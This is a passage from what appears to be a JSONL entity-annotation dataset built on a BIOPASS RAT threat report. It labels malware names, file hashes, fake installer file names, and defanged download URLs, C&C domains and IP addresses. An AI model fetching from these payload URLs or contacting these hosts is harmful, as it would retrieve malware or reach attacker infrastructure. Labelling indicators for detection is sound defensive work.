","entities":[{"id":10275,"label":"malware","start_offset":0,"end_offset":11},{"id":10276,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10277,"label":"malware","start_offset":122,"end_offset":133},{"id":10279,"label":"malware","start_offset":252,"end_offset":263},{"id":10281,"label":"malware","start_offset":374,"end_offset":385},{"id":10282,"label":"SHA2","start_offset":420,"end_offset":484},{"id":10283,"label":"malware","start_offset":496,"end_offset":507},{"id":10284,"label":"SHA2","start_offset":542,"end_offset":606},{"id":10285,"label":"malware","start_offset":618,"end_offset":629},{"id":10286,"label":"SHA2","start_offset":664,"end_offset":728},{"id":10287,"label":"malware","start_offset":751,"end_offset":762},{"id":10288,"label":"SHA2","start_offset":797,"end_offset":861},{"id":10278,"label":"SHA2","start_offset":168,"end_offset":232},{"id":10280,"label":"SHA2","start_offset":298,"end_offset":362},{"id":49076,"label":"malware","start_offset":20,"end_offset":44},{"id":49078,"label":"FILEPATH","start_offset":234,"end_offset":250},{"id":49079,"label":"malware","start_offset":272,"end_offset":296},{"id":49081,"label":"malware","start_offset":394,"end_offset":418},{"id":49083,"label":"malware","start_offset":516,"end_offset":540},{"id":49087,"label":"malware","start_offset":771,"end_offset":795},{"id":49077,"label":"malware","start_offset":142,"end_offset":166},{"id":49080,"label":"FILEPATH","start_offset":364,"end_offset":372},{"id":49084,"label":"FILEPATH","start_offset":608,"end_offset":616},{"id":49086,"label":"FILEPATH","start_offset":730,"end_offset":749},{"id":49088,"label":"FILEPATH","start_offset":863,"end_offset":882},{"id":49089,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49082,"label":"FILEPATH","start_offset":486,"end_offset":494},{"id":49085,"label":"malware","start_offset":638,"end_offset":662}],"relations":[{"id":654,"from_id":10275,"to_id":49076,"type":"duplicate-of"},{"id":655,"from_id":10277,"to_id":49077,"type":"duplicate-of"},{"id":656,"from_id":10279,"to_id":49079,"type":"duplicate-of"},{"id":657,"from_id":10281,"to_id":49081,"type":"duplicate-of"},{"id":658,"from_id":10283,"to_id":49083,"type":"duplicate-of"},{"id":659,"from_id":10285,"to_id":49085,"type":"duplicate-of"},{"id":660,"from_id":10287,"to_id":49087,"type":"duplicate-of"},{"id":661,"from_id":49088,"to_id":10288,"type":"duplicate-of"},{"id":662,"from_id":49086,"to_id":10286,"type":"duplicate-of"},{"id":663,"from_id":49084,"to_id":10284,"type":"duplicate-of"},{"id":664,"from_id":49082,"to_id":10282,"type":"duplicate-of"},{"id":665,"from_id":49080,"to_id":10280,"type":"duplicate-of"},{"id":666,"from_id":49078,"to_id":10278,"type":"duplicate-of"},{"id":667,"from_id":49089,"to_id":10276,"type":"duplicate-of"},{"id":668,"from_id":10276,"to_id":49076,"type":"indicates"},{"id":669,"from_id":49089,"to_id":49076,"type":"indicates"},{"id":670,"from_id":49078,"to_id":49077,"type":"indicates"},{"id":671,"from_id":10278,"to_id":49077,"type":"indicates"},{"id":672,"from_id":49080,"to_id":49079,"type":"indicates"},{"id":673,"from_id":10280,"to_id":49079,"type":"indicates"},{"id":674,"from_id":49082,"to_id":49081,"type":"indicates"},{"id":675,"from_id":10282,"to_id":49081,"type":"indicates"},{"id":676,"from_id":49084,"to_id":49083,"type":"indicates"},{"id":677,"from_id":10284,"to_id":49083,"type":"indicates"},{"id":678,"from_id":49086,"to_id":49085,"type":"indicates"},{"id":679,"from_id":10286,"to_id":49085,"type":"indicates"},{"id":680,"from_id":49088,"to_id":10287,"type":"indicates"}],"Comments":[]} -{"id":3410,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A ba44c22a3224c3a201202b69d86df2a78f0cd1d4ac1119eb29cae33f09027a9a Silverlight2.exe","entities":[{"id":10289,"label":"malware","start_offset":0,"end_offset":11},{"id":10290,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49090,"label":"malware","start_offset":20,"end_offset":44},{"id":49091,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":681,"from_id":10289,"to_id":49090,"type":"duplicate-of"},{"id":682,"from_id":49091,"to_id":10290,"type":"duplicate-of"},{"id":683,"from_id":49091,"to_id":49090,"type":"indicates"},{"id":684,"from_id":10290,"to_id":49090,"type":"indicates"}],"Comments":[]} -{"id":3411,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bd8dc7e3909f6663c0fff653d7afbca2b89f2e9bc6f27adaab27f640ccf52975 Silverlight.exe ","entities":[{"id":10291,"label":"malware","start_offset":0,"end_offset":11},{"id":10292,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49092,"label":"malware","start_offset":20,"end_offset":44},{"id":49093,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":685,"from_id":10291,"to_id":49092,"type":"duplicate-of"},{"id":686,"from_id":49093,"to_id":10292,"type":"duplicate-of"},{"id":687,"from_id":49093,"to_id":49092,"type":"indicates"},{"id":688,"from_id":10292,"to_id":49092,"type":"indicates"}],"Comments":[]} -{"id":3412,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bf4f50979b7b29f2b6d192630b8d7b76adb9cb65157a1c70924a47bf519c4edd test.exe","entities":[{"id":10293,"label":"malware","start_offset":0,"end_offset":11},{"id":10294,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49094,"label":"malware","start_offset":20,"end_offset":44},{"id":49095,"label":"FILEPATH","start_offset":112,"end_offset":120}],"relations":[{"id":689,"from_id":10293,"to_id":49094,"type":"duplicate-of"},{"id":690,"from_id":49095,"to_id":10294,"type":"duplicate-of"},{"id":691,"from_id":49095,"to_id":49094,"type":"indicates"},{"id":692,"from_id":10294,"to_id":49094,"type":"indicates"}],"Comments":[]} -{"id":3413,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c11906210465045a54a5de1053ce0624308a8c7b342bb707a24e534ca662dc89 test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A c3fa69e15a63b151f8d1dc3018284e153ad2eb672d54555eaeaac79396b64e3b test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 flashplayerpp_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c8542bffc7a2074b8d84c4de5f18e3c8ced30b1f6edc13047ce99794b388285c flash2.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10295,"label":"malware","start_offset":0,"end_offset":11},{"id":10296,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10297,"label":"malware","start_offset":128,"end_offset":139},{"id":10298,"label":"SHA2","start_offset":174,"end_offset":238},{"id":10299,"label":"malware","start_offset":250,"end_offset":261},{"id":10300,"label":"SHA2","start_offset":296,"end_offset":360},{"id":10301,"label":"malware","start_offset":392,"end_offset":403},{"id":10303,"label":"malware","start_offset":516,"end_offset":527},{"id":10302,"label":"SHA2","start_offset":438,"end_offset":502},{"id":49098,"label":"FILEPATH","start_offset":112,"end_offset":126},{"id":49101,"label":"FILEPATH","start_offset":362,"end_offset":390},{"id":49102,"label":"malware","start_offset":412,"end_offset":436},{"id":49096,"label":"malware","start_offset":20,"end_offset":44},{"id":49097,"label":"malware","start_offset":148,"end_offset":172},{"id":49099,"label":"FILEPATH","start_offset":240,"end_offset":248},{"id":49100,"label":"malware","start_offset":270,"end_offset":294},{"id":49103,"label":"FILEPATH","start_offset":504,"end_offset":514}],"relations":[{"id":696,"from_id":10298,"to_id":49099,"type":"duplicate-of"},{"id":698,"from_id":49101,"to_id":10300,"type":"duplicate-of"},{"id":700,"from_id":49103,"to_id":10302,"type":"duplicate-of"},{"id":701,"from_id":10296,"to_id":49096,"type":"indicates"},{"id":702,"from_id":49098,"to_id":49096,"type":"indicates"},{"id":703,"from_id":10298,"to_id":49097,"type":"indicates"},{"id":704,"from_id":49099,"to_id":49097,"type":"indicates"},{"id":693,"from_id":10295,"to_id":49096,"type":"duplicate-of"},{"id":694,"from_id":49098,"to_id":10296,"type":"duplicate-of"},{"id":695,"from_id":10297,"to_id":49097,"type":"duplicate-of"},{"id":697,"from_id":10299,"to_id":49100,"type":"duplicate-of"},{"id":699,"from_id":10301,"to_id":49102,"type":"duplicate-of"},{"id":705,"from_id":49101,"to_id":49100,"type":"indicates"},{"id":706,"from_id":10300,"to_id":49100,"type":"indicates"},{"id":707,"from_id":10302,"to_id":49102,"type":"indicates"},{"id":708,"from_id":49103,"to_id":49102,"type":"indicates"}],"Comments":[]} -{"id":3414,"text":"Win64.BIOPASS.A","entities":[{"id":49104,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3415,"text":" cce6b17084a996e2373aaebbace944a17d3e3745e9d88efad4947840ae92fd55","entities":[{"id":10304,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3416,"text":"Silverlight_ins.exe ","entities":[{"id":49105,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3417,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A d18d84d32a340d20ab07a36f9e4b959495ecd88d7b0e9799399fcc4e959f536b flash_installer.exe","entities":[{"id":10305,"label":"malware","start_offset":0,"end_offset":11},{"id":10306,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49106,"label":"malware","start_offset":20,"end_offset":44},{"id":49107,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":709,"from_id":10305,"to_id":49106,"type":"duplicate-of"},{"id":711,"from_id":10306,"to_id":49106,"type":"indicates"},{"id":710,"from_id":49107,"to_id":10306,"type":"duplicate-of"},{"id":712,"from_id":49107,"to_id":49106,"type":"indicates"}],"Comments":[]} -{"id":3418,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10307,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3419,"text":"Win64.BIOPASS.A","entities":[{"id":49108,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3420,"text":" e4109875e84b3e9952ef362abc5b826c003b3d0b1b06d530832359906b0b8831","entities":[{"id":10308,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3421,"text":" flash.exe BIOPASS RAT Loader","entities":[{"id":10309,"label":"malware","start_offset":12,"end_offset":23},{"id":49109,"label":"FILEPATH","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} -{"id":3422,"text":" Backdoor.Win64.BIOPASS.A e52ea54cfe3afd93a53e368245c5630425e326291bf1b2599b75dbf8e75b7aeb flashplayer_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A f1ad25b594a855a3c9af75c5da74b44d900f6fbb655033f9a98a956292011c8e Silverlight.exe","entities":[{"id":10311,"label":"malware","start_offset":121,"end_offset":132},{"id":10310,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10312,"label":"SHA2","start_offset":167,"end_offset":231},{"id":49110,"label":"malware","start_offset":1,"end_offset":25},{"id":49111,"label":"malware","start_offset":141,"end_offset":165},{"id":49112,"label":"FILEPATH","start_offset":93,"end_offset":119},{"id":49113,"label":"FILEPATH","start_offset":233,"end_offset":248}],"relations":[{"id":716,"from_id":49113,"to_id":49111,"type":"indicates"},{"id":717,"from_id":10311,"to_id":49111,"type":"duplicate-of"},{"id":713,"from_id":49112,"to_id":10310,"type":"duplicate-of"},{"id":714,"from_id":49113,"to_id":10312,"type":"duplicate-of"},{"id":715,"from_id":10312,"to_id":49111,"type":"indicates"},{"id":718,"from_id":49112,"to_id":49110,"type":"indicates"},{"id":719,"from_id":10310,"to_id":49110,"type":"indicates"}],"Comments":[]} -{"id":3423,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa1d70b6b5b1a5e478c7d9d840aae0cc23d80476d9eea884a73d1b7e3926a209 64.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa7fbca583b22d92ae6d832d90ee637cc6ac840203cd059c6582298beb955aee test.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10313,"label":"malware","start_offset":0,"end_offset":11},{"id":10315,"label":"malware","start_offset":120,"end_offset":131},{"id":10317,"label":"malware","start_offset":242,"end_offset":253},{"id":10314,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10316,"label":"SHA2","start_offset":166,"end_offset":230},{"id":49115,"label":"FILEPATH","start_offset":112,"end_offset":118},{"id":49116,"label":"malware","start_offset":140,"end_offset":164},{"id":49117,"label":"FILEPATH","start_offset":232,"end_offset":240},{"id":49114,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":720,"from_id":10313,"to_id":49114,"type":"duplicate-of"},{"id":723,"from_id":10317,"to_id":49116,"type":"duplicate-of"},{"id":728,"from_id":10316,"to_id":49116,"type":"indicates"},{"id":721,"from_id":49115,"to_id":10314,"type":"duplicate-of"},{"id":722,"from_id":49117,"to_id":10316,"type":"duplicate-of"},{"id":724,"from_id":10315,"to_id":49116,"type":"duplicate-of"},{"id":725,"from_id":10314,"to_id":49114,"type":"indicates"},{"id":726,"from_id":49115,"to_id":49114,"type":"indicates"},{"id":727,"from_id":49117,"to_id":49116,"type":"indicates"}],"Comments":[]} -{"id":3424,"text":"Win64.BIOPASS.A","entities":[{"id":49118,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3425,"text":" fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851","entities":[{"id":10318,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3426,"text":"test4.exe BIOPASS RAT Loader ","entities":[{"id":10319,"label":"malware","start_offset":11,"end_offset":22},{"id":49119,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":3427,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} -{"id":3428,"text":"Win64.BIOPASS.A","entities":[{"id":49120,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3429,"text":" fb812a2ccdab0a9703e8e4e12c479ff809a72899374c1abf06aef55abbbf8edc","entities":[{"id":10320,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3430,"text":"flash_installer.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10321,"label":"malware","start_offset":21,"end_offset":32},{"id":49121,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3431,"text":"Win64.BIOPASS.A","entities":[{"id":49122,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3432,"text":" ee2e9a1d3b593fd464f885b734d469d047cdb1bc879e568e7c33d786e8d1e8e2","entities":[{"id":10322,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3433,"text":"aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan","entities":[{"id":10324,"label":"SHA2","start_offset":67,"end_offset":131},{"id":10330,"label":"SHA2","start_offset":471,"end_offset":535},{"id":10332,"label":"SHA2","start_offset":601,"end_offset":665},{"id":10326,"label":"SHA2","start_offset":200,"end_offset":264},{"id":10328,"label":"SHA2","start_offset":333,"end_offset":397},{"id":49123,"label":"FILEPATH","start_offset":0,"end_offset":7},{"id":49129,"label":"malware","start_offset":280,"end_offset":307},{"id":49132,"label":"FILEPATH","start_offset":667,"end_offset":673},{"id":49135,"label":"malware","start_offset":147,"end_offset":174},{"id":49136,"label":"malware","start_offset":418,"end_offset":445},{"id":49124,"label":"malware","start_offset":43,"end_offset":65},{"id":49125,"label":"FILEPATH","start_offset":133,"end_offset":145},{"id":49126,"label":"malware","start_offset":176,"end_offset":198},{"id":49127,"label":"FILEPATH","start_offset":266,"end_offset":278},{"id":49128,"label":"malware","start_offset":309,"end_offset":331},{"id":49130,"label":"FILEPATH","start_offset":399,"end_offset":416},{"id":49131,"label":"FILEPATH","start_offset":537,"end_offset":546},{"id":49133,"label":"malware","start_offset":577,"end_offset":599},{"id":49134,"label":"malware","start_offset":9,"end_offset":41},{"id":49137,"label":"malware","start_offset":447,"end_offset":469},{"id":49138,"label":"malware","start_offset":548,"end_offset":575},{"id":49139,"label":"malware","start_offset":675,"end_offset":710}],"relations":[{"id":729,"from_id":49123,"to_id":49124,"type":"indicates"},{"id":730,"from_id":49134,"to_id":49124,"type":"duplicate-of"},{"id":731,"from_id":10324,"to_id":49124,"type":"indicates"},{"id":732,"from_id":49125,"to_id":49124,"type":"indicates"},{"id":733,"from_id":49135,"to_id":49126,"type":"duplicate-of"},{"id":734,"from_id":10326,"to_id":49126,"type":"indicates"},{"id":735,"from_id":49127,"to_id":49126,"type":"indicates"},{"id":736,"from_id":49127,"to_id":10326,"type":"duplicate-of"},{"id":737,"from_id":49129,"to_id":49128,"type":"duplicate-of"},{"id":738,"from_id":10328,"to_id":49128,"type":"indicates"},{"id":739,"from_id":49130,"to_id":49128,"type":"indicates"},{"id":740,"from_id":49130,"to_id":10328,"type":"duplicate-of"},{"id":741,"from_id":49136,"to_id":49137,"type":"duplicate-of"},{"id":742,"from_id":49131,"to_id":10330,"type":"duplicate-of"},{"id":743,"from_id":49131,"to_id":49137,"type":"indicates"},{"id":744,"from_id":10330,"to_id":49137,"type":"indicates"},{"id":745,"from_id":49138,"to_id":49133,"type":"duplicate-of"},{"id":746,"from_id":49139,"to_id":49133,"type":"duplicate-of"},{"id":747,"from_id":49132,"to_id":10332,"type":"duplicate-of"},{"id":748,"from_id":49132,"to_id":49133,"type":"indicates"},{"id":749,"from_id":10332,"to_id":49133,"type":"indicates"}],"Comments":[]} -{"id":3434,"text":".Win32.BIOPASS.A 17e43d31585b4c3ac6bf724bd7263761af75a59335b285b045fce597b3825ed0","entities":[{"id":10334,"label":"SHA2","start_offset":18,"end_offset":82},{"id":49140,"label":"malware","start_offset":1,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3435,"text":"systemsetting.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A b3bd28951789ef7cfaf659e07e198b45b04a2f3cde268e6ede4d4f877959341e systemsetting.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A e0caebfbd2804fcde30e75f2c6d06e84b3bf89ed85db34d6f628b25dca7a9a0f YIZHI_SIGNED.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A 2503549352527cb0ffa1811a44481f6980961d98f9d5a96d5926d5676c31b9ee socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 8ba72a391fb653b2cc1e5caa6f927efdf46568638bb4fc25e6f01dc36a96533b flashplayerpp_install_cn.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783 beep.sys Derusbi Trojan.Win64.DERUSBI.C a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97 Browser_plugin (8).exe Cobalt Strike Loader Trojan.Win64.COBEACON.SUX IP\/Domain\/URL Note webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT loaders softres[.]oss-accelerate[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT loaders flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host BIOPASS RAT modules and stolen data lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used to host Cobalt Strike loader scripts bps-rhk[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used for RTMP live streaming wxdget[.]oss-cn-hongkong[.]aliyuncs[.]com Cloud storage bucket used for storing stolen WeChat data chinanode[.]microsoft-update-service[.]com:38080 BIOPASS RAT C&C server 0x3s[.]com XSS attack domain update[.]flash-installer[.]com Associated fake installer domain update[.]flash-installers[.]com Associated fake installer domain flash[.]com[.]cm Associated fake installer domain flash[.]com[.]se Associated fake installer domain flashi[.]com[.]cn Associated fake installer domain flash[.]co[.]cm Associated fake installer domain 47[.]57[.]142[.]30 Cobalt Strike C&C server 47[.]57[.]186[.]151 Cobalt Strike C&C server 103[.]158[.]190[.]58 Cobalt Strike C&C server 207[.]148[.]100[.]49 Cobalt Strike C&C server microsoft[.]update[.]flash[.]com.se Cobalt Strike C&C server hxxps:\/\/webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0[.]oss-cn-hongkong.aliyuncs[.]com\/Silverlight_ins.exe BIOPASS RAT loader download URL hxxps:\/\/webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com\/flash_ins[.]exe BIOPASS RAT loader download URL hxxp:\/\/softres.oss-accelerate[.]aliyuncs[.]com\/Silverlight[.]exe BIOPASS RAT loader download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/big.txt BIOPASS RAT script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/Online.txt BIOPASS RAT script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/files.zip Python runtime package download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/ServiceHub.zip Python runtime package download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/c1222.txt c1222 module script download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/cdaemon.txt cdaemon module download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/x.txt Cobalt Strike Python loader download URL hxxp:\/\/lualibs.oss-cn-hongkong[.]aliyuncs.com\/x86\/1-CS-443.lua Cobalt Strike Lua loader download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/s.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/sc2.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/sc3.txt Cobalt Strike shellcode download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/getwechatdb.txt getwechatdb plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/wechat.txt getwechatdb plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/xss_spoof.zip xss_spoof plug-in download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/xss.txt XSS payload download URL hxxp:\/\/flashdownloadserver[.]oss-cn-hongkong.aliyuncs[.]com\/res\/csplugins\/script.txt XSS payload download URL hxxp:\/\/0x3s[.]com\/x[.]js XSS injection URL Tags Malware | Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[{"id":10335,"label":"malware","start_offset":19,"end_offset":30},{"id":10337,"label":"malware","start_offset":162,"end_offset":173},{"id":10338,"label":"SHA2","start_offset":220,"end_offset":284},{"id":10339,"label":"malware","start_offset":315,"end_offset":326},{"id":10341,"label":"malware","start_offset":453,"end_offset":464},{"id":10343,"label":"malware","start_offset":602,"end_offset":613},{"id":10344,"label":"MD5","start_offset":655,"end_offset":719},{"id":10346,"label":"SHA2","start_offset":764,"end_offset":828},{"id":10350,"label":"malware","start_offset":1047,"end_offset":1058},{"id":10353,"label":"malware","start_offset":1145,"end_offset":1156},{"id":10356,"label":"malware","start_offset":1256,"end_offset":1267},{"id":10336,"label":"SHA2","start_offset":77,"end_offset":141},{"id":10345,"label":"malware","start_offset":731,"end_offset":738},{"id":10340,"label":"SHA2","start_offset":373,"end_offset":437},{"id":10342,"label":"SHA2","start_offset":506,"end_offset":570},{"id":10360,"label":"tools","start_offset":1371,"end_offset":1384},{"id":10347,"label":"tools","start_offset":854,"end_offset":867},{"id":10363,"label":"malware","start_offset":1648,"end_offset":1659},{"id":10365,"label":"IPV4","start_offset":2044,"end_offset":2062},{"id":10367,"label":"IPV4","start_offset":2090,"end_offset":2109},{"id":10369,"label":"IPV4","start_offset":2137,"end_offset":2157},{"id":10371,"label":"IPV4","start_offset":2185,"end_offset":2205},{"id":10374,"label":"tools","start_offset":2270,"end_offset":2283},{"id":10375,"label":"malware","start_offset":2405,"end_offset":2416},{"id":10376,"label":"malware","start_offset":2541,"end_offset":2552},{"id":10377,"label":"malware","start_offset":2640,"end_offset":2651},{"id":10378,"label":"malware","start_offset":2746,"end_offset":2757},{"id":10379,"label":"malware","start_offset":2855,"end_offset":2866},{"id":10380,"label":"tools","start_offset":3403,"end_offset":3416},{"id":10386,"label":"attack-pattern","start_offset":4328,"end_offset":4331},{"id":10387,"label":"attack-pattern","start_offset":4440,"end_offset":4443},{"id":10388,"label":"attack-pattern","start_offset":4492,"end_offset":4495},{"id":10382,"label":"tools","start_offset":3509,"end_offset":3522},{"id":10383,"label":"tools","start_offset":3619,"end_offset":3632},{"id":10384,"label":"tools","start_offset":3730,"end_offset":3743},{"id":10385,"label":"tools","start_offset":3841,"end_offset":3854},{"id":10370,"label":"tools","start_offset":2159,"end_offset":2172},{"id":10368,"label":"tools","start_offset":2111,"end_offset":2124},{"id":10372,"label":"tools","start_offset":2207,"end_offset":2220},{"id":10366,"label":"tools","start_offset":2064,"end_offset":2077},{"id":49152,"label":"malware","start_offset":482,"end_offset":504},{"id":49159,"label":"DOMAIN","start_offset":1293,"end_offset":1335},{"id":49166,"label":"DOMAIN","start_offset":1703,"end_offset":1733},{"id":49172,"label":"DOMAIN","start_offset":2233,"end_offset":2268},{"id":49141,"label":"FILEPATH","start_offset":0,"end_offset":17},{"id":49147,"label":"FILEPATH","start_offset":721,"end_offset":729},{"id":49148,"label":"FILEPATH","start_offset":830,"end_offset":852},{"id":49149,"label":"attack-pattern","start_offset":1684,"end_offset":1694},{"id":49150,"label":"malware","start_offset":196,"end_offset":218},{"id":49153,"label":"malware","start_offset":631,"end_offset":653},{"id":49154,"label":"malware","start_offset":740,"end_offset":762},{"id":49156,"label":"DOMAIN","start_offset":930,"end_offset":1011},{"id":49142,"label":"malware","start_offset":53,"end_offset":75},{"id":49151,"label":"malware","start_offset":349,"end_offset":371},{"id":49155,"label":"malware","start_offset":876,"end_offset":901},{"id":49162,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49169,"label":"DOMAIN","start_offset":1888,"end_offset":1904},{"id":49170,"label":"DOMAIN","start_offset":1940,"end_offset":1957},{"id":49171,"label":"DOMAIN","start_offset":1993,"end_offset":2008},{"id":49143,"label":"FILEPATH","start_offset":143,"end_offset":160},{"id":49144,"label":"FILEPATH","start_offset":297,"end_offset":313},{"id":49145,"label":"FILEPATH","start_offset":439,"end_offset":451},{"id":49146,"label":"FILEPATH","start_offset":572,"end_offset":600},{"id":49157,"label":"DOMAIN","start_offset":1059,"end_offset":1109},{"id":49158,"label":"DOMAIN","start_offset":1166,"end_offset":1220},{"id":49160,"label":"DOMAIN","start_offset":1401,"end_offset":1443},{"id":49161,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49189,"label":"DOMAIN","start_offset":4124,"end_offset":4211},{"id":49191,"label":"DOMAIN","start_offset":4354,"end_offset":4438},{"id":49163,"label":"DOMAIN","start_offset":1598,"end_offset":1646},{"id":49164,"label":"DOMAIN","start_offset":1672,"end_offset":1682},{"id":49165,"label":"DOMAIN","start_offset":1497,"end_offset":1538},{"id":49167,"label":"DOMAIN","start_offset":1836,"end_offset":1852},{"id":49168,"label":"DOMAIN","start_offset":1769,"end_offset":1800},{"id":49174,"label":"DOMAIN","start_offset":2438,"end_offset":2539},{"id":49175,"label":"DOMAIN","start_offset":2574,"end_offset":2638},{"id":49176,"label":"DOMAIN","start_offset":2673,"end_offset":2744},{"id":49178,"label":"DOMAIN","start_offset":2888,"end_offset":2961},{"id":49179,"label":"DOMAIN","start_offset":3000,"end_offset":3078},{"id":49181,"label":"DOMAIN","start_offset":3226,"end_offset":3301},{"id":49184,"label":"DOMAIN","start_offset":3548,"end_offset":3617},{"id":49188,"label":"DOMAIN","start_offset":4004,"end_offset":4088},{"id":49192,"label":"DOMAIN","start_offset":4466,"end_offset":4490},{"id":49173,"label":"DOMAIN","start_offset":2296,"end_offset":2403},{"id":49177,"label":"DOMAIN","start_offset":2779,"end_offset":2853},{"id":49180,"label":"DOMAIN","start_offset":3117,"end_offset":3190},{"id":49182,"label":"DOMAIN","start_offset":3332,"end_offset":3401},{"id":49183,"label":"DOMAIN","start_offset":3445,"end_offset":3507},{"id":49185,"label":"DOMAIN","start_offset":3657,"end_offset":3728},{"id":49186,"label":"DOMAIN","start_offset":3768,"end_offset":3839},{"id":49190,"label":"DOMAIN","start_